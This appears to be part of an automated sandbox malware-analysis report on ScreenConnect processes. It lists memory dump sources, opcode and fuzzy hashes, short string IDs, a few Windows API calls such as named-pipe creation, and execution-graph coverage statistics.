                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MA4$HQA4$`14$h14$p14
                                                                                                              • API String ID: 0-2168121343
                                                                                                              • Opcode ID: db7e8e4592fe2c3bdfaf9267120f6c12733a3684ec86c7573b5376c8e1679b2e
                                                                                                              • Instruction ID: 5ac3e9c7a547329658ba61fb7435b54b786d7903433798815e9e615bf958d824
                                                                                                              • Opcode Fuzzy Hash: db7e8e4592fe2c3bdfaf9267120f6c12733a3684ec86c7573b5376c8e1679b2e
                                                                                                              • Instruction Fuzzy Hash: 48A10AB270CA498FEB98EE28C4A5AA537D1FF55350B0401B9D54DD7287DE29FC02C780

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \C4$0G|4$D|4$F|4
                                                                                                              • API String ID: 0-171402600
                                                                                                              • Opcode ID: f3df10e46081ca6e7d7b37573cfe4d8f047ced0500edc1f17ad9e8e40b773045
                                                                                                              • Instruction ID: ea571fa746468a2514dc48a071cfaae4b21f25702d80c18fab1533939a33eaa1
                                                                                                              • Opcode Fuzzy Hash: f3df10e46081ca6e7d7b37573cfe4d8f047ced0500edc1f17ad9e8e40b773045
                                                                                                              • Instruction Fuzzy Hash: 78711762B0DB8A4FE796DB2C98A85613BE1EF9735070841FBD189CB197D918FC058781

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: h`|4$h`|4$pa|4$pa|4
                                                                                                              • API String ID: 0-729069609
                                                                                                              • Opcode ID: 58b2b797810a92226795923cdb4351f97be00b2478e671eaf6a542886bda5a8f
                                                                                                              • Instruction ID: 05ecf676beff01200e938194ce032e18b419466e63fda7b6d9911cba693ef4a0
                                                                                                              • Opcode Fuzzy Hash: 58b2b797810a92226795923cdb4351f97be00b2478e671eaf6a542886bda5a8f
                                                                                                              • Instruction Fuzzy Hash: 6F415892B1DA4A4FE7A5E72C18E56757BD1EFA968074401B6E40CC3287DC1AFC4583C2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `\C4$p\C4$0q4
                                                                                                              • API String ID: 0-3602877608
                                                                                                              • Opcode ID: 491e8796772830d8b9141064aa3c0ccd9b760f61888ad1c207163852bc247226
                                                                                                              • Instruction ID: faf448903deaa171bc8d97899ef5aa84de180600192901067a757c0a2d22bc1c
                                                                                                              • Opcode Fuzzy Hash: 491e8796772830d8b9141064aa3c0ccd9b760f61888ad1c207163852bc247226
                                                                                                              • Instruction Fuzzy Hash: A0B19470B1890A8FEBA8EB1C84A9B6973E1FF99340F5401B9D40DD7296DE29FC41D780
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0,|4$@*|4$x\C4
                                                                                                              • API String ID: 0-2875663441
                                                                                                              • Opcode ID: 7528ef0b4c7f5f4c3dd54419b48bece38b07f3098249a24ceb8b73161ff51c6a
                                                                                                              • Instruction ID: 9d3777b1873644b4745534701f52322e1682e0500ec97ca81cd03d22795c7e71
                                                                                                              • Opcode Fuzzy Hash: 7528ef0b4c7f5f4c3dd54419b48bece38b07f3098249a24ceb8b73161ff51c6a
                                                                                                              • Instruction Fuzzy Hash: 7961C172B0C94A8FEBA8EE1894E56B533D1FF96394F1404BAC14DC7192DE29BC0687C0

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4030431394.00007FFD34410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34410000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4030431394.00007FFD34410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34410000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4030431394.00007FFD34410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34410000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66bb699585217cffb90c80349e77813c4611f2eca622e2ca15433758fd55f40e
                                                                                                              • Instruction ID: d0abc17eb3af9f401eb588f9eb1f12e02179d2ecb00be0fa141602150504f26d
                                                                                                              • Opcode Fuzzy Hash: 66bb699585217cffb90c80349e77813c4611f2eca622e2ca15433758fd55f40e
                                                                                                              • Instruction Fuzzy Hash: FEE12C75709A498FDADCEE1CC0A0AA173E1FF65358B6409B9D15DCB297CA29F842CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34ac64dc54f4673cb901b3dc4e4f5a27f37ae1e1a7cfca0216aab02a8bdc77d7
                                                                                                              • Instruction ID: 624c1e87ae966aa24a4236745c177f011f54697d93aa882026085c778fda86bc
                                                                                                              • Opcode Fuzzy Hash: 34ac64dc54f4673cb901b3dc4e4f5a27f37ae1e1a7cfca0216aab02a8bdc77d7
                                                                                                              • Instruction Fuzzy Hash: C2B1AF34608B098FDBDCEF19C4A4A65B3E1FF69344B6509ADD059CF29BCA25F842CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d817f237ff367a2391f104f2c06f8dcbaec4c57e855d00f05b3aa2581e3770d
                                                                                                              • Instruction ID: a28a0e8aad4a1337ffc57acdd7e6547509160b1189abcf4007a6e0c364929ebc
                                                                                                              • Opcode Fuzzy Hash: 7d817f237ff367a2391f104f2c06f8dcbaec4c57e855d00f05b3aa2581e3770d
                                                                                                              • Instruction Fuzzy Hash: 3D91443470DA498FDBDDEF28C4A46A177E1FF99304B2445A9C059CB68BCA29F847C780
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0659b231b9934a65baa4b6a5b6232fb081a98cd4e8842af7a40a1cb2e2838c9a
                                                                                                              • Instruction ID: dc33040be0c10ea94d2b76d894f36a7fbccecd9551cda572162fd59bba8a1223
                                                                                                              • Opcode Fuzzy Hash: 0659b231b9934a65baa4b6a5b6232fb081a98cd4e8842af7a40a1cb2e2838c9a
                                                                                                              • Instruction Fuzzy Hash: C2A15FB0E092458FE758EB2488B17A937A1EF56350F0001BEC64DD72C2DE3D65469BD6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 631d57a2e0cd1206f68161d93e4f6501825f96e911325557d2f1413dbcbe62c3
                                                                                                              • Instruction ID: 67c60dae496411aa58ca8742340895d76cc80b77c1e098c6a59f4345f3270ac4
                                                                                                              • Opcode Fuzzy Hash: 631d57a2e0cd1206f68161d93e4f6501825f96e911325557d2f1413dbcbe62c3
                                                                                                              • Instruction Fuzzy Hash: 0BF02741B28D4A4FE798BB6C14E61F96281EF9425479440FAD00DCB18FCC5CD9868390
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5f03c6324a557151ebfe4ecb605012a3018d9c743cef3b94efe95ab3b430be38
                                                                                                              • Instruction ID: 315afaf3a161ed8d972579d96f5a3218cabcda69c898dca20c0eed775b34e8c6
                                                                                                              • Opcode Fuzzy Hash: 5f03c6324a557151ebfe4ecb605012a3018d9c743cef3b94efe95ab3b430be38
                                                                                                              • Instruction Fuzzy Hash: D1F0BE92E4E3C34AF7AA133919B12747EA18F47240F4E40FBC28ACA0D3DD5CA885D352
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d59b3ddc8805485c801cb4a931e8f1ca1ae06242374abee498d5ab2ed77c6c14
                                                                                                              • Instruction ID: 086df0c554899e5e0aa0c816cb7333ebcfd906691830c4633475098f5d233493
                                                                                                              • Opcode Fuzzy Hash: d59b3ddc8805485c801cb4a931e8f1ca1ae06242374abee498d5ab2ed77c6c14
                                                                                                              • Instruction Fuzzy Hash: B1F09631A0DB894FD366A774846A1A67F71FF46200B4900FAD949C7193DE39A9058B81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0dca6d3bd96aeed108f956b8012f8daea4e5f56fdc391bba83138f0ee8d092c7
                                                                                                              • Instruction ID: e34cc247cf0b44e2fd440613a9ea01d2297bfe18875cdc338ca9d7057818cc19
                                                                                                              • Opcode Fuzzy Hash: 0dca6d3bd96aeed108f956b8012f8daea4e5f56fdc391bba83138f0ee8d092c7
                                                                                                              • Instruction Fuzzy Hash: DAE0D86150F3D40FDB56973484A88E13FA0DE1722030900EBD681CF073E518864AD751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68c3bd5c748716afcfc447ac47a82d836fd673e75ab5a7a82ed8bad7123eb114
                                                                                                              • Instruction ID: 2e5a263a6cc8e11264d667615124ad291124c63871cc7d4872a87c04f71a7582
                                                                                                              • Opcode Fuzzy Hash: 68c3bd5c748716afcfc447ac47a82d836fd673e75ab5a7a82ed8bad7123eb114
                                                                                                              • Instruction Fuzzy Hash: 40F0303150DBCC8FCB42EB6498748D5BFB0EE57310B0500D7D549CB0A3D6289D58CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90c43ab374a83431b766d6309d2b478e2590548326f15b34d1d0cedac4b22b58
                                                                                                              • Instruction ID: c7cd22eb7614aa2ea27e3c2f0135a871e90d75333f1a9f4a297af93e48b3aea5
                                                                                                              • Opcode Fuzzy Hash: 90c43ab374a83431b766d6309d2b478e2590548326f15b34d1d0cedac4b22b58
                                                                                                              • Instruction Fuzzy Hash: DCE0C266F4C61342FBAC627579F13B970C18F4A350F49807A951EC50C9CE6CACC0E191
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 347f0b7135f5e5c5f2d18436f12486f5e8780fa3befab43a2867de5049558438
                                                                                                              • Instruction ID: feecda814065343fe0349b719dfa3628ddb1bac8a0a7acbef9890db5ad9ea0d1
                                                                                                              • Opcode Fuzzy Hash: 347f0b7135f5e5c5f2d18436f12486f5e8780fa3befab43a2867de5049558438
                                                                                                              • Instruction Fuzzy Hash: 9DE0127161CA494FE784DB0CD4E29A6F7D0FB98394F40067EE04DD2254DA69E6818741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0e2a14db6a487908dc47464bdef2e08ca689927f5ad23e0348041c9f50b92fac
                                                                                                              • Instruction ID: 518e6a0dd4e181f27c923de6a20148d9ea8eadcb76f5687aff6479b41275f261
                                                                                                              • Opcode Fuzzy Hash: 0e2a14db6a487908dc47464bdef2e08ca689927f5ad23e0348041c9f50b92fac
                                                                                                              • Instruction Fuzzy Hash: 43C09B14F1C54A47F145EB2444E11BE21527FC9205B524435D10DC118BCD7CF501B585
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d76afac1e650475ba7e3295e8fdefa6e9c986a2f192fa6ce9471c63227a2a203
                                                                                                              • Instruction ID: 293d8893b71151a0d9d10230b0ca9a87cafca06211a6e253c1bdbf6ec36f9f22
                                                                                                              • Opcode Fuzzy Hash: d76afac1e650475ba7e3295e8fdefa6e9c986a2f192fa6ce9471c63227a2a203
                                                                                                              • Instruction Fuzzy Hash: 44A15CB2E0E2968BE71D5E3858AE1F43B94DF43395F0400BED249C6492DB1D350BD6D2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:16
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 16201 7ffd34709314 16204 7ffd3470931d 16201->16204 16202 7ffd347094d3 GlobalMemoryStatusEx 16203 7ffd347094e5 16202->16203 16204->16202 16205 7ffd34709412 16204->16205 16214 7ffd343f8014 16216 7ffd343f801d 16214->16216 16215 7ffd343f8082 16216->16215 16217 7ffd343f80f6 SetProcessMitigationPolicy 16216->16217 16218 7ffd343f8152 16217->16218 16206 7ffd343f3662 16207 7ffd34415670 ConnectNamedPipe 16206->16207 16209 7ffd34415722 16207->16209 16210 7ffd343f3642 16211 7ffd344154d0 CreateNamedPipeW 16210->16211 16213 7ffd34415603 16211->16213
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2282286283.00007FFD34700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd34700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                              • String ID:
                                                                                                              • API String ID: 1890195054-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1088084561-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1088084561-0